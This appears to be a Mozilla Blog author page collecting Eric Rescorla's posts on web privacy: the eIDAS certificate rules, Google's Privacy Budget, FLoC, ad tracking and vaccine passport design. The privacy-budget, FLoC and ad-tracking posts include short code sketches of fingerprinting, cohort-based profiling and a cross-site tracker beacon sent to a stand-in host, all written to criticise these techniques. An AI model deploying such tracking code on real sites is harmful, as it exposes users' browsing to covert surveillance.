Eric Rescorla, Author at The Mozilla Blog
https://blog.mozilla.org/en/author/ekrmozilla-com/

The web is for everyone: Our vision for the evolution of the web
https://blog.mozilla.org/en/mozilla/mozilla-webvision-future-of-web/ (23 Mar 2022)

Over the last two decades, the web has woven itself into the fabric of our lives. What began as a research project has become the world’s most important communication platform and an essential tool for billions of people. 

But despite its success — and sometimes because of it — the web has real problems. People are routinely spied on by advertisers and oppressive governments, often at the moments when the open web is most necessary. They find themselves disempowered by hostile sites, sluggish experiences, and overly-complex technologies. And much of the web remains out of reach for non-native English speakers and people with disabilities.

Mozilla believes the web should be for everyone — open, empowering, and safe. In its best moments, the web exemplifies these values today. But too often the web today does not deliver on this promise. To that end, we’ve mapped out a detailed vision of the changes we want to see in the web in the years ahead, and the work we believe is necessary to achieve them. This includes efforts on a number of fronts — deploying ubiquitous encryption, ending tracking, simpler and faster technologies, next-generation internationalization support and much more.

We believe that to make the web a better place, we need to focus our work on these nine areas:

  • Protect user privacy: Essentially all user behavior on the web is subject to tracking and surveillance. A truly open and safe web requires that what people do remains private; this requires gradually shifting the ecosystem towards a new equilibrium without breaking the web in the process.
  • Protect users from malicious code: Users must be able to browse without fear that their devices will be compromised, and yet every web browser routinely has major security vulnerabilities. The technologies finally exist to significantly reduce this kind of security issue; we are increasing our use of them in Firefox and look forward to others doing the same.
  • Encrypt everything: All user communications should be encrypted. We are near the end of a long process to secure all HTTP traffic, and encryption needs to be retrofitted into existing legacy protocols such as DNS and built into all new protocols by default.
  • Extend the web… Safely: New capabilities make the web more powerful but also create new risks. The value added by new capabilities needs to be weighed against these risks; some applications may ultimately not be well suited for the web and that’s OK.
  • Make the web fast enough for any use: While web browsers are much faster now than they were five years ago, we still see major performance issues. Fixing these requires making both browsers and infrastructure faster, and also making it easier and more attractive for people to build fast sites.
  • Make it easy for anyone to publish on the web: While early websites were relatively simple and easy to build, the demands of performance and high production values have made the web increasingly daunting to work with. Our strategy is to categorize development techniques into increasing tiers of complexity, and then work to eliminate the usability gaps that push people up the ladder towards more complex approaches.
  • Give users the power to experience the web on their own terms: The web is for users. In order to fulfill that promise we need to ensure that they, not sites, control their experience, whether that means blocking ads or viewing content in accessible form. This requires building a browser that displays the web the way the user wants it — rather than just following instructions from the site — as well as strengthening the technical properties of web standards that enable this kind of reinterpretation.
  • Provide a first-class experience for non-English-speakers: The technical architecture and content ecosystem of the web both work best for North-American English speakers, who are a fraction of the world. We want the web to work well for everyone regardless of where they live and what languages they speak.
  • Improve accessibility for people with disabilities: As web experiences have grown richer, they’ve also become more difficult to use with assistive technology like screen readers. We want to reverse this trend.

You can read much more about each of these objectives in the full document. We’ve been using this roadmap to guide our work on Firefox and other Mozilla products. We also recognize that it’s a big web and fixing it is a team effort. We’re looking forward to working with others to build a better web.

The website security ecosystem protects individuals against fraud and state-sponsored surveillance. Let’s not break it.
https://blog.mozilla.org/en/security/mozilla-eff-cybersecurity-experts-publish-letter-on-dangers-of-article-452-eidas-regulation/ (3 Mar 2022)

Principle four of the Mozilla Manifesto states that “Individuals’ security and privacy on the internet are fundamental and must not be treated as optional.” We’ve made real progress on improving security on the Internet, but unfortunately, a draft law under discussion in the EU – the eIDAS Regulation – threatens to reverse that progress. Mozilla and many others have been raising the alarm in the last few months. Today, leading cybersecurity experts are weighing in too, in an open letter to EU lawmakers that warns of the risks that eIDAS represents to web security.

Website certificates sit at the heart of web security. When you make a connection to a web site, say “mozilla.org”, that connection is protected with TLS, but TLS only protects the connection itself; each server has a certificate which ensures that the server on the other end is “mozilla.org” and not an attacker impersonating Mozilla. Certificates are issued by Certificate Authorities (CAs), who are responsible for verifying that a given entity controls the site in question. 

A malicious CA — or just one which did not have secure practices — could issue incorrect certificates which could then be used by attackers to attack people’s connections and steal their data. In order to ensure that CAs are held to high standards, each major browser and operating system maintains their own “Root Program,” which is responsible for vetting CAs to ensure that they have acceptable issuance practices, and, where necessary, removing CAs who do not adhere to those practices. For 18 years, Mozilla has operated its Root Program in the open, with published practices and where each proposed CA is considered on a public mailing list, ensuring that any stakeholder can be heard.

Proposed EU legislation threatens to disrupt this balance. Article 45.2 of the eIDAS Regulation mandates support for a new kind of certificate called a Qualified Website Authentication Certificate (QWAC). Under this regulation, QWACs would be issued by Trust Service Providers (another name for CAs), with those TSPs being approved not by the browsers but rather by the governments of individual EU member states. Browsers would be required to trust certificates issued by those TSPs regardless of whether they would meet Root Program security requirements, and without any way to remove misbehaving CAs. 

This change would weaken the security of the web by preventing browsers from protecting their users from the security risks – such as identity theft and financial fraud – that a misbehaving CA can expose them to. Worse, compelled inclusion of CAs in our root program would set a precedent for action by repressive regimes. We have already seen state actors (such as Kazakhstan) try to ramp up their surveillance capacities by forcing browsers to automatically trust their CAs — a dangerous practice that browsers and civil society organizations have successfully resisted so far. But if we set the precedent that web browsers can’t hold CAs to appropriate security standards, that could change quickly.

Technical experts at Mozilla, the Internet Society, the Electronic Frontier Foundation, as well as European civil society organisations have all spoken out about how these requirements would be bad for the web. Today, Mozilla and the EFF are publishing a letter signed by 38 cybersecurity experts about the danger of Article 45.2 to web security and recommendations for how lawmakers can avoid those dangers. The letter demonstrates that the cybersecurity community believes this provision is a threat to web security, creating more problems than it solves.   

Analysis of Google’s Privacy Budget Proposal
https://blog.mozilla.org/en/mozilla/google-privacy-budget-analysis/ (1 Oct 2021)

Fingerprinting is a major threat to user privacy on the Web. Fingerprinting uses existing properties of your browser like screen size, installed add-ons, etc. to create a unique or semi-unique identifier which it can use to track you around the Web. Even if individual values are not particularly unique, the combination of values can be unique (e.g., how many people are running Firefox Nightly, live in North Dakota, have an M1 Mac and a big monitor, etc.)
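To make the arithmetic concrete, here is a small sketch of how individually weak signals combine. The prevalence numbers are invented for illustration, and summing the bits assumes the attributes are independent of one another.

```typescript
// Sketch: how individually weak attributes combine into an identifier.
// The prevalence numbers are invented, and summing surprisal assumes the
// attributes are independent of one another.
const attributes: Record<string, number> = {
  "runs Firefox Nightly": 0.001,  // assumed fraction of users with this property
  "lives in North Dakota": 0.002,
  "uses an M1 Mac": 0.05,
  "has a large monitor": 0.1,
};

// Surprisal of one attribute, in bits: -log2(probability).
const bits = (p: number): number => -Math.log2(p);

let total = 0;
for (const [name, p] of Object.entries(attributes)) {
  console.log(`${name}: ${bits(p).toFixed(1)} bits`);
  total += bits(p);
}

// For reference, ~33 bits is enough to single out one person among ~8 billion.
console.log(`combined (if independent): ${total.toFixed(1)} bits`);
```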

This post discusses a proposal by Google to address fingerprinting called the Privacy Budget. The idea behind the Privacy Budget is to estimate the amount of information revealed by each piece of fingerprinting information (called a “fingerprinting surface”, e.g., screen resolution) and then limit the total amount of that information a site can obtain about you. Once the site reaches that limit (the “budget”), further attempts to learn more about you would fail, perhaps by reporting an error or returning a generic value. This idea has been getting a fair amount of attention and has been proposed as a potential privacy mitigation in some in-development W3C specifications.
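For concreteness, here is a rough sketch of the kind of per-site accounting the proposal implies. The surface names, bit costs, and budget value are invented for illustration and are not taken from Google's proposal.

```typescript
// Hypothetical per-site accounting of the kind the Privacy Budget implies.
// The surface costs and the 10-bit budget are invented; assigning them well
// is exactly the hard part discussed in the list below.
const BUDGET_BITS = 10;

const surfaceCost: Record<string, number> = {
  "screen.width": 2.5,
  "screen.height": 2.5, // strongly correlated with width, so adding both overstates it
  "navigator.userAgent": 3.0,
  "canvas-fingerprint": 8.0,
};

const spentBySite = new Map<string, number>();

// "deny" means the browser would return an error or a generic value instead.
function query(site: string, surface: string): "allow" | "deny" {
  const spent = spentBySite.get(site) ?? 0;
  const cost = surfaceCost[surface] ?? 1.0;
  if (spent + cost > BUDGET_BITS) return "deny";
  spentBySite.set(site, spent + cost);
  return "allow";
}

console.log(query("news.example", "screen.width"));        // allow (2.5 of 10 bits used)
console.log(query("news.example", "navigator.userAgent")); // allow (5.5 of 10 bits used)
console.log(query("news.example", "canvas-fingerprint"));  // deny  (would reach 13.5 bits)
```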

While this seems like an attractive idea, our detailed analysis of the proposal raises questions about its feasibility.  We see a number of issues:

  • Estimating the amount of information revealed by a single surface is quite difficult. Moreover, because some values will be much more common than others, any total estimate is misleading. For instance, the Chrome browser has many users and so learning someone uses Chrome is not very identifying; by contrast, learning that someone uses Firefox Nightly is quite identifying because there are few Nightly users.
  • Even if we are able to set a common value for the budget, it is unclear how to determine whether a given set of queries exceeds that value. The problem is that these queries are not independent and so you can’t just add up each query. For instance, screen width and screen height are highly correlated and so once a site has queried one, learning the other is not very informative.
  • Enforcement is likely to lead to surprising and disruptive site breakage because sites will exceed the budget and then be unable to make API calls which are essential to site function. This will be exacerbated because the order in which the budget is used is nondeterministic and depends on factors such as the network performance of various sites, so some users will experience breakage and others will not.
  • It is possible that the privacy budget mechanism itself can be used for tracking by exhausting the budget with a particular pattern of queries and then testing to see which queries still work (because they already succeeded).

While we understand the appeal of a global solution to fingerprinting — and no doubt this is the motivation for the Privacy Budget idea appearing in specifications — the underlying problem here is the large amount of fingerprinting-capable surface that is exposed to the Web. There does not appear to be a shortcut around addressing that. We believe the best approach is to minimize the easy-to-access fingerprinting surface by limiting the amount of information exposed by new APIs and gradually reducing the amount of information exposed by existing APIs. At the same time, browsers can and should attempt to detect abusive patterns by sites and block those sites, as Firefox already does.

This post is part of a series of posts analyzing privacy-preserving advertising proposals.

For more on this:

Building a more privacy-preserving ads-based ecosystem

The future of ads and privacy

Privacy analysis of FLoC

Mozilla responds to the UK CMA consultation on google’s commitments on the Chrome Privacy Sandbox

Privacy analysis of SWAN.community and Unified ID 2.0

Privacy analysis of FLoC
https://blog.mozilla.org/en/privacy-security/privacy-analysis-of-floc/ (10 Jun 2021)

In a previous post, I wrote about a new set of technologies called “Privacy Preserving Advertising”, which are intended to allow for advertising without compromising privacy. This post discusses one of those proposals–Federated Learning of Cohorts (FLoC)–which Chrome is currently testing. The idea behind FLoC is to make it possible to target ads based on the interests of users without revealing their browsing history to advertisers. We have conducted a detailed analysis of FLoC privacy. This post provides a summary of our findings.

In the current web, trackers (and hence advertisers) associate a cookie with each user. Whenever a user visits a website that has an embedded tracker, the tracker gets the cookie and can thus build up a list of the sites that a user visits. Advertisers can use the information gained from tracking browsing history to target ads that are potentially relevant to a given user’s interests. The obvious problem here is that it involves advertisers learning everywhere you go. 

FLoC replaces this cookie with a new “cohort” identifier which represents not a single user but a group of users with similar interests. Advertisers can then build a list of the sites that all the users in a cohort visit, but not the history of any individual user. If the interests of users in a cohort are truly similar, this cohort identifier can be used for ad targeting. Based on an experiment it has run with FLoC, Google has stated that FLoC provides 95% of the per-dollar conversion rate of interest-based ad targeting using tracking cookies.

Our analysis shows several privacy issues that we believe need to be addressed:

Cohort IDs can be used for tracking

Although any given cohort is going to be relatively large (the exact size is still under discussion, but these groups will probably consist of thousands of users), that doesn’t mean that they cannot be used for tracking. Because only a few thousand people will share a given cohort ID, if trackers have any significant amount of additional information, they can narrow down the set of users very quickly. There are a number of possible ways this could happen:

Browser Fingerprinting

Not all browsers are the same. For instance, some people use Chrome and some use Firefox; some people are on Windows and others are on Mac; some people speak English and others speak French. Each piece of user-specific variation can be used to distinguish between users. When combined with a FLoC cohort that only has a few thousand users, a relatively small amount of information is required to identify an individual person or at least narrow the FLoC cohort down to a few people. Let’s give an example using some numbers that are plausible. Imagine you have a fingerprinting technique which divides people up into about 8000 groups (each group here is somewhat bigger than a ZIP code). This isn’t enough to identify people individually, but if it’s combined with FLoC using cohort sizes of about 10000, then the number of people in each fingerprinting group/FLoC cohort pair is going to be very small, potentially as small as one. Though there might be larger groups that can’t be identified this way, that is not the same as having a system that is free from individual targeting.
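The arithmetic behind that example, spelled out with the same illustrative numbers:

```typescript
// The arithmetic behind the example above, with the same illustrative numbers.
const fingerprintGroups = 8000; // groups a modest fingerprinting technique can distinguish
const cohortSize = 10000;       // assumed number of users sharing one FLoC cohort ID

// If the fingerprint is roughly independent of the cohort, the expected number
// of users who share both a cohort ID and a fingerprint group is tiny:
console.log(cohortSize / fingerprintGroups); // 1.25 -- often a single person
```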

Multiple Visits

People’s interests aren’t constant and neither are their FLoC IDs. Currently, FLoC IDs seem to be recomputed every week or so. This means that if a tracker is able to use other information to link up user visits over time, they can use the combination of FLoC IDs in week 1, week 2, etc. to distinguish individual users. This is a particular concern because it works even with modern anti-tracking mechanisms such as Firefox’s Total Cookie Protection (TCP). TCP is intended to prevent trackers from correlating visits across sites but not multiple visits to one site. FLoC restores cross-site tracking even if users have TCP enabled. 
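A rough sketch of the math, assuming a hypothetical cohort count and a tracker that can already link return visits to its own site:

```typescript
// Sketch: weekly cohort IDs accumulate for a tracker that can already link a
// visitor's return visits to one site (e.g., via a login or a first-party cookie).
// The cohort count is an assumption for the example.
const cohortCount = 30000;                  // assumed total number of cohorts
const bitsPerWeek = Math.log2(cohortCount); // up to ~14.9 bits if IDs were uniform

// Hypothetical sequence of cohort IDs observed for one returning visitor:
const weeklyIds = ["1234", "877", "20451"];

// After three weeks the sequence carries up to ~45 bits -- far more than is
// needed to single someone out, and every site the visitor returns to sees it.
console.log((weeklyIds.length * bitsPerWeek).toFixed(0));
```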

FLoC leaks more information than you want

With cookie-based tracking, the amount of information a tracker gets is determined by the number of sites it is embedded on. Moreover, a site which wants to learn about user interests must itself participate in tracking the user across a large number of sites, work with some reasonably large tracker, or work with other trackers. Under a permissive cookie policy, this type of tracking is straightforward using third-party cookies and cookie syncing. However, when third-party cookies are blocked (or isolated by site in TCP) it’s much more difficult for trackers to collect and share information about a user’s interests across sites.

FLoC undermines these more restrictive cookie policies: because FLoC IDs are the same across all sites, they become a shared key to which trackers can associate data from external sources. For example, it’s possible for a tracker with a significant amount of first-party interest data to operate a service which just answers questions about the interests of a given FLoC ID. E.g., “Do people who have this cohort ID like cars?”. All a site needs to do is call the FLoC APIs to get the cohort ID and then use it to look up information in the service. In addition, the ID can be combined with fingerprinting data to ask “Do people who live in France, have Macs, run Firefox, and have this ID like cars?” The end result here is that any site will be able to learn a lot about you with far less effort than they would need to expend today.
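As a hedged sketch of what that looks like in practice: document.interestCohort() is the API Chrome exposed during its FLoC origin trial, while the interest-lookup service and its endpoint below are hypothetical.

```typescript
// Hedged sketch: using the cohort ID as a shared key into a third-party
// interest database. document.interestCohort() is the API from Chrome's FLoC
// origin trial; interests.example and its lookup endpoint are hypothetical.
async function profileVisitor(): Promise<void> {
  // Every site that calls this gets the same ID for a given user that week.
  const cohort = await (document as any).interestCohort(); // { id, version }

  // A tracker with its own first-party interest data can answer questions
  // keyed on that ID, with no need to track this particular user anywhere.
  const response = await fetch(
    `https://interests.example/lookup?cohort=${cohort.id}&question=likes-cars`
  );
  console.log(await response.json()); // e.g. { likesCars: 0.83 }
}
```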

FLoC’s countermeasures are insufficient

Google has proposed several mechanisms to address these issues.

First, sites have the option of whether or not to participate in FLoC. In the current experiment that Chrome is conducting, sites are included in the FLoC computation if they do ads-type stuff, either “load ads-related resources” or call the FLoC APIs. It’s not clear what the eventual inclusion criteria are, but it seems likely that any site which includes advertising will be included in the computation by default. Sites can also opt-out of FLoC entirely using the Permissions-Policy HTTP header but it seems likely that many sites will not do so.
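For reference, the opt-out itself is just an HTTP response header. The minimal Node server below is a sketch of sending it; interest-cohort is the policy name used during the origin trial.

```typescript
// Minimal Node server that opts its pages out of FLoC by sending the
// Permissions-Policy header ("interest-cohort" is the policy name used during
// the origin trial).
import { createServer } from "node:http";

createServer((req, res) => {
  res.setHeader("Permissions-Policy", "interest-cohort=()");
  res.writeHead(200, { "Content-Type": "text/html" });
  res.end("<p>This site asked to be excluded from the FLoC cohort computation.</p>");
}).listen(8080);
```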

Second, Google itself will suppress FLoC cohorts which it thinks are too closely correlated with “sensitive” topics. Google provides the details in this whitepaper, but the basic idea is that they will look to see if the users in a given cohort are significantly more likely to visit a set of sites associated with sensitive categories, and if so they will just return an empty cohort ID for that cohort. Similarly, they say they will remove sites which they think are sensitive from the FLoC computation. These defenses seem like they are going to be very difficult to execute in practice for several reasons: (1) the list of sensitive categories may be incomplete or people may not agree on what categories are sensitive, (2) there may be other sites which correlate to sensitive sites but are not themselves sensitive, and (3) clever trackers may be able to learn sensitive information despite these controls. For instance: it might be the case that English-speaking users with FLoC ID X are no more likely to visit sensitive site type A, but French-speaking users are. 

While these mitigations seem useful, they seem to mostly be improvements at the margins, and don’t address the basic issues described above, which we believe require further study by the community.

Summary

FLoC is premised on a compelling idea: enable ad targeting without exposing users to risk. But the current design has a number of privacy properties that could create significant risks if it were to be widely deployed in its current form. It is possible that these properties can be fixed or mitigated — we suggest a number of potential avenues in our analysis — but further work on FLoC should be focused on addressing these issues.

For more on this:

Building a more privacy-preserving ads-based ecosystem

The future of ads and privacy

Mozilla responds to the UK CMA consultation on google’s commitments on the Chrome Privacy Sandbox

Privacy analysis of SWAN.community and Unified ID 2.0

Analysis of Google’s Privacy Budget Proposal

The future of ads and privacy
https://blog.mozilla.org/en/mozilla/the-future-of-ads-and-privacy/ (29 May 2021)

The modern web is funded by advertisements. Advertisements pay for all those “free” services you love, as well as many of the products you use on a daily basis — including Firefox. There’s nothing inherently wrong with advertising: Mozilla’s Principle #9 states that “Commercial involvement in the development of the internet brings many benefits.” However, that principle goes on to say that “a balance between commercial profit and public benefit is critical” and that’s where things have gone wrong: advertising on the web in many situations is powered by ubiquitous tracking of people’s activity on the web in a way that is deeply harmful to users and to the web as a whole.

Some Background

The ad tech ecosystem is incredibly complicated, but at its heart, the way that web advertising works is fairly simple. As you browse the web, trackers (mostly, but not exclusively advertisers), follow you around and build up a profile of your browsing history. Then, when you go to a site which wants to show you an ad, that browsing history is used to decide which of the potential ads you might see you actually get shown. 

The visible part of web tracking is creepy enough — why are those pants I looked at last week following me around the Internet? — but the invisible part is even worse: hundreds of companies you’ve never heard of follow you around as you browse and then use your data for their own purposes or sell it to other companies you’ve also never heard of. 

The primary technical mechanism used by trackers is what’s called “third party cookies”. A good description of third party cookies can be found here; in brief, a cookie is a piece of data that a website stores on your browser and can retrieve later. A third party cookie is a cookie which is set by someone other than the page you’re visiting (typically a tracker). The tracker works with the web site to embed some code from the tracker on their page (often this code is also responsible for showing ads) and that code sets a cookie for the tracker. Every time you go to a page the tracker is embedded on, it sees the same cookie and can use that to link up all the sites you go to.
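A hedged sketch of those mechanics, with hypothetical domain names (tracker.example stands in for the tracker, news.example and shop.example for unrelated sites that embed its code):

```typescript
// Hedged sketch of the mechanics described above. tracker.example stands in
// for the tracker; news.example and shop.example are unrelated sites that both
// embed its script.
//
// 1. The script, served from tracker.example, sets a cookie on its own domain.
//    SameSite=None; Secure is what lets it be sent in a third-party context:
//
//      Set-Cookie: uid=abc123; Domain=tracker.example; SameSite=None; Secure
//
// 2. From then on, every page that embeds the script fires a request like this,
//    carrying that same cookie plus the URL of the embedding page:
const reportVisit = (embeddingPage: string) =>
  fetch("https://tracker.example/collect?page=" + encodeURIComponent(embeddingPage), {
    credentials: "include", // sends the uid=abc123 cookie set in step 1
  });

reportVisit("https://news.example/article-42");   // called from news.example...
reportVisit("https://shop.example/winter-pants"); // ...and from shop.example:
// both visits arrive with uid=abc123, so the tracker links them to one person.
```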

Cookies themselves are an important part of the web — they’re what let you log into sites, maintain your shopping carts, etc. However, third party cookies are used in a way that the designers of the web didn’t really intend and unfortunately, they’re now ubiquitous. While they have some legitimate uses, like federated login, they are mostly used for tracking user behavior.

Obviously, this is bad and it shouldn’t be a surprise to anybody who has followed our work in Firefox that we believe this needs to change. We’ve been working for years to drive the industry in a better direction. In 2015 we launched Tracking Protection, our first major step towards blocking tracking in the browser. In 2019 we turned on a newer version of our anti-tracking technology by default for all of our users. And we’re not the only ones doing this.

We believe all browsers should protect their users from tracking, particularly cookie-based tracking, and should be moving expeditiously to do so.

Privacy Preserving Advertising

Although third-party cookies are bad news, now that they are so baked into the web, it won’t be easy to get rid of them. Because they’re a dual-use technology with some legitimate applications, just turning them off (or doing something more sophisticated like Firefox Total Cookie Protection) can cause some web sites to break for users. Moreover, we have to be constantly on guard against new tracking techniques.

One idea that has gotten a lot of attention recently is what’s called “Privacy Preserving Advertising” (PPA). The basic idea has a long history with systems such as Adnostic, PrivAd, and AdScale but has lately been reborn with proposals from Google, Microsoft, Apple, and Criteo, among others. The details are of course fairly complicated, but the general idea is straightforward: identify the legitimate (i.e., non-harmful) applications for tracking techniques and build alternative technical mechanisms for those applications without threatening user privacy. Once we have done that, it becomes much more practical to strictly limit the use of third party cookies.

This is a generally good paradigm: technology has advanced a lot since cookies were invented in the 1990s and it’s now possible to do many things privately that used to require just collecting user data. But, of course, it’s also possible to use technology to do things that aren’t so good (which is how we got into this hole in the first place). When looking at a set of technologies like PPA, we need to ask:

  1. Are the use cases for the technology actually good for users and for the web?
  2. Do these technologies improve user privacy and security? Are they collecting the minimal amount of data that is necessary to accomplish the task?
  3. Are these technologies being developed in an open standards process with input from all stakeholders?

Because this isn’t just one technology but rather a set of them, we should expect some pieces to be better than others. In particular, ad measurement is a use case that is important to the ecosystem, and we think that getting this one component right can drive value for consumers and engage advertising stakeholders. There’s overlap here with technologies like Prio which we already use in Firefox. On the other hand, we’re less certain about a number of the proposed technologies for user targeting, which have privacy properties that seem hard to analyze. This is a whole new area of technology, so we should expect it to be hard, but that’s also a reason to make sure we get it right.

What’s next?

Obviously, this is just the barest overview. In upcoming posts we’ll provide a more detailed survey of the space, covering the existing situation in more detail, some of the proposals on offer, and where we think the big opportunities are to improve things in both the technical and policy domains.

For more on this:

Building a more privacy preserving ads-based ecosystem

Privacy analysis of FLoC

Mozilla responds to the UK CMA consultation on google’s commitments on the Chrome Privacy Sandbox

Privacy analysis of SWAN.community and Unified ID 2.0

Analysis of Google’s Privacy Budget Proposal

Notes on Implementing Vaccine Passports
https://blog.mozilla.org/en/mozilla/leadership/notes-on-implementing-vaccine-passports/ (22 Apr 2021)

Now that we’re starting to get widespread COVID vaccination, “vaccine passports” have started to become more relevant. The idea behind a vaccine passport is that you would have some kind of credential that you could use to prove that you had been vaccinated against COVID; various entities (airlines, clubs, employers, etc.) might require such a passport as proof of vaccination. Right now deployment of this kind of mechanism is fairly limited: Israel has one called the green pass and the State of New York is using something called the Excelsior Pass based on some IBM tech.

Like just about everything surrounding COVID, there has been a huge amount of controversy around vaccine passports (see, for instance, this EFF post, ACLU post, or this NYT article).

There seem to be four major sets of complaints:

  1. Requiring vaccination is inherently a threat to people’s freedom
  2. Because vaccine distribution has been unfair, with a number of communities having trouble getting vaccines, a requirement to get vaccinated increases inequity and vaccine passports enable that.
  3. Vaccine passports might be implemented in a way that is inaccessible for people without access to technology (especially to smartphones).
  4. Vaccine passports might be implemented in a way that is a threat to user privacy and security.

I don’t have anything particularly new to say about the first two questions, which aren’t really about technology but rather about ethics and political science, so I don’t think it’s that helpful to weigh in on them, except to observe that vaccination requirements are nothing new: it’s routine to require children to be vaccinated to go to school, people to be vaccinated to enter certain countries, etc. That isn’t to say that this practice is without problems but merely that it’s already quite widespread, so we have a bunch of prior art here. On the other hand, the questions of how to design a vaccine passport system are squarely technical; the rest of this post will be about that.

What are we trying to accomplish?

As usual, we want to start by asking what we’re trying to accomplish. At a high level, we have a system in which a vaccinated person (VP) needs to demonstrate to some entity (the Relying Party (RP)) that they have been vaccinated within some relevant time period. This brings with it some security requirements:

  1. Unforgeability: It should not be possible for an unvaccinated person to persuade the RP that they have been vaccinated.
  2. Information minimization: The RP should learn as little as possible about the VP, consistent with unforgeability.
  3. Untraceability: Nobody but the VP and RP should know which RPs the VP has proven their status to.

I want to note at this point that there has been a huge amount of emphasis on the unforgeability property, but it’s fairly unclear — at least to me — how important it really is. We’ve had trivially forgeable paper-based vaccination records for years and I’m not aware of any evidence of widespread fraud. However, this seems to be something people are really concerned about — perhaps due to how polarized the questions of vaccination and masks have become — and we have already heard some reports of sales of fake vaccine cards, so perhaps we really do need to worry about cheating. It’s certainly true that people are talking about requiring proof of COVID vaccination in many more settings than, for instance, proof of measles vaccination, so there is somewhat more incentive to cheat. In any case, the privacy requirements are a real concern.

In addition, we have some functional requirements/desiderata:

  1. The system should be cheap to bring up and operate.
  2. It should be easy for VPs to get whatever credential they need and to replace it if it is lost or destroyed.
  3. VPs should not be required to have some sort of device (e.g., a smartphone).

The Current State

In the US, most people who are getting vaccinated are getting paper vaccination cards.

This card is a useful record that you’ve been vaccinated, with which vaccine, and when you have to come back, but it’s also trivially forgeable. Given that they’re made of paper with effectively no anti-counterfeiting measures (not even the ones that are in currency), it would be easy to make one yourself, and there are already people selling them online. As I said above, it’s not clear entirely how much we ought to worry about fraud, but if we do, these cards aren’t up to the task. In any case, they also have sub-optimal information minimization properties: it’s not necessary to know how old you are or which vaccine you got in order to know whether you were vaccinated.

The cards are pretty good on the traceability front: nobody but you and the RP learns anything, and they’re cheap to make and use, without requiring any kind of device on the user’s side. They’re not that convenient if you lose them, but given how cheap they are to make, it’s not the worst thing in the world if the place you got vaccinated has to mail you a new one.

Improving The Situation

A good place to start is to ask how to improve the paper design to address the concerns above.

The data minimization issue is actually fairly easy to address: just don’t put unnecessary information on the card: as I said, there’s no reason to have your DOB or the vaccine type on the piece of paper you use for proof.

However, it’s actually not straightforward to remove your name. The reason for this is that the RP needs to be able to determine that the credential actually applies to you rather than to someone else. Even if we assume that the credential is tamper-resistant (see below), that doesn’t mean it belongs to you. There are really two main ways to address this:

  1. Have the VP’s name (or some ID number) on the credential and require them to provide a biometric credential (i.e., a photo ID) that proves they are the right person.
  2. Embed a biometric directly into the credential.

This should all be fairly familiar because it’s exactly the same as other situations where you prove your identity. For instance, when you get on a plane, TSA or the airline reads your boarding pass, which has your name, and then uses your photo ID to compare that to your face and decide if it’s really you (this is option 1). By contrast, when you want to prove you are licensed to drive, you present a credential that has your biometrics directly embedded (i.e., a drivers license).

This leaves us with the question of how to make the credential tamper-resistant. There are two major approaches here:

  1. Make the credential physically tamper-resistant
  2. Make the credential digitally tamper-resistant

Physically Tamper-Resistant Credentials

A physically tamper-resistant credential is just one which is hard to change or for unauthorized people to manufacture. This usually includes features like holograms, tamper-evident sealing (so that you can’t disassemble it without leaving traces), etc. Most of us have a lot of experience with physically tamper-resistant credentials such as passports, drivers licenses, etc. These generally aren’t completely impossible to forge, but they’re designed to be somewhat difficult. From a threat model perspective, this is probably fine; after all we’re not trying to make it impossible to pretend to be vaccinated, just difficult enough that most people won’t try.

In principle, this kind of credential has excellent privacy because it’s read by a human RP rather than some machine. Of course, one could take a photo of it, but there’s no need to. As an analogy, if you go to a bar and show your driver’s license to prove you are over 21, that doesn’t necessarily create a digital record. Unfortunately for privacy, increasingly those kinds of previously analog admissions processes are actually done by scanning the credential (which usually has some machine readable data), thus significantly reducing the privacy benefit.

The main problem with a physically tamper-resistant credential is that it’s expensive to make and that by necessity you need to limit the number of people who can make it: if it’s cheap to buy the equipment to make the credential then it will also be cheap to forge. This is inconsistent with rapidly issuing credentials concurrently with vaccinating people: when I got vaccinated there were probably 25 staff checking people in and each one had a stack of cards. It’s hard to see how you would scale the production of tamper-resistant plastic cards to an operation like this, let alone to one that happens at doctors offices and pharmacies all over the country. It’s potentially possible that they could report people’s names to some central authority which then makes the cards, but even then we have scaling issues, especially if you want the cards to be available 2 weeks after vaccination. A related problem is that if you lose the card, it’s hard to replace because you have the same issuing problem.[1]

Digitally Tamper-Resistant Credentials

The major alternative here is to design a digitally tamper-resistant system. Effectively what this means is that the issuing authority digitally signs a credential. This provides cryptographically strong authentication of the data in the credential in such a way that anyone can verify it as long as they have the right software. The credential just needs to contain the same information as would be on the paper credential: the fact that you were vaccinated (and potentially a validity date) plus either your name (so you can show your photo id) or your identity (so the RP can directly match it against you).
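Here is a minimal sketch of the issue-and-verify step using Node's built-in Ed25519 support. The payload fields and key handling are simplified for illustration and do not follow any particular deployed scheme (Green Pass, the WHO format, etc.).

```typescript
// Minimal sketch of a digitally signed credential using Node's built-in
// Ed25519 support. The payload fields are illustrative; real schemes (Green
// Pass, the WHO certificate) define their own formats and key management.
import { generateKeyPairSync, sign, verify } from "node:crypto";

// In practice the issuing health authority holds the private key; verifier
// apps ship with (or can fetch) the corresponding public key.
const { publicKey, privateKey } = generateKeyPairSync("ed25519");

const credential = JSON.stringify({
  name: "Jane Doe",        // or a photo/biometric reference instead of a name
  vaccinated: true,
  validUntil: "2021-12-31",
});

// Issuer side: sign the payload. The payload plus signature is what would be
// encoded into a 2-D bar code the holder can print or display on a phone.
const signature = sign(null, Buffer.from(credential), privateKey);

// Verifier (RP) side: check the signature locally, with no call to any server.
const ok = verify(null, Buffer.from(credential), publicKey, signature);
console.log(ok ? "credential verified" : "invalid credential");
```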

This design has a number of nice properties. First, it’s cheap to manufacture: you can do the signing on a smartphone app.[2] It doesn’t need any special machinery from the RP: you can encode the credential as a 2-D bar code which the VP can show on their phone or print out. And they can make as many copies as they want, just like your airline boarding pass.

The major drawback of this design is that it requires special software on the RP side to read the 2D bar code, verify the digital signature, and verify the result. However, this software is relatively straightforward to write and can run on any smartphone, using the camera to read the bar code.[3] So, while this is somewhat of a pain, it’s not that big a deal.

This design also has generally good privacy properties: the information encoded in credential is (or at least can be) the minimal set needed to validate that you are you and that you are vaccinated, and because the credential can be locally verified, there’s no central authority which learns where you go. Or, at least, it’s not necessary for there to be a central authority: nothing stops the RP from reporting that you were present back to some central location, but that’s just inherent in them getting your name and picture. As far as I know, there’s no way to prevent that, though if the credential just contains your picture rather than an identifier, it’s somewhat better (though the code itself is still unique, so you can be tracked) especially because the RP can always capture your picture anyway.[4]

By this point you should be getting the impression that signed credentials are a pretty good design, and it’s no surprise that this seems to be the design that WHO has in mind for their smart vaccination certificate. They seem to envision encoding quite a bit more information than is strictly required for a “yes/no” decision and then having a “selective disclosure” feature that exposes just that minimal information and can be encoded in a bar code.

What about Green Pass, Excelsior Pass, etc?

